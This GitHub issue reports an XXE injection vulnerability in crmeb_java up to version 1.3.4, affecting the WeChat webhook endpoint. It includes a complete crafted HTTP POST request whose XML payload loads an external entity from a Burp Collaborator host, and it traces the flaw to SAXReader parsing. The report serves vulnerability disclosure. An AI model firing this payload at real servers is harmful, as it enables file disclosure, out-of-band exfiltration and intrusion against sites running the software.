crmeb_java icon indicating copy to clipboard operation
crmeb_java copied to clipboard
verified publisher icon crmeb

There is a XXE injection vulnerability in the crmeb_java system /api/public/wechat/message/webHook

Open Tyaoo opened this issue 2 years ago • 0 comments

[Suggested description] There is a XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SaxReader component.

[Vulnerability Type] XML External Entity (XXE) Injection

[Vendor of Product] https://github.com/crmeb/crmeb_java

[Affected Product Code Base] <=1.3.4

[Affected Component] /api/public/wechat/message/webHook

[Attack Type] Remote

[Vulnerability details] Send the crafted request package to the api interface /api/public/wechat/message/webHook

POST /api/public/wechat/message/webHook HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 180

<?xml version="1.0"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://8r0e5uqbuix3subuusrvl4ec43atyi.burpcollaborator.net/evil.xml" >]>
<foo>&xxe;</foo>

image

[Impact Code execution] true

[Cause of vulnerability] The interface /api/public/wechat/message/webHook calls the function init. image It calls the function xmlToMap. image There is a XXE Injection vulnerability with the SAXReader component. image

That's all, thanks.

Tyaoo avatar Mar 16 '23 05:03 Tyaoo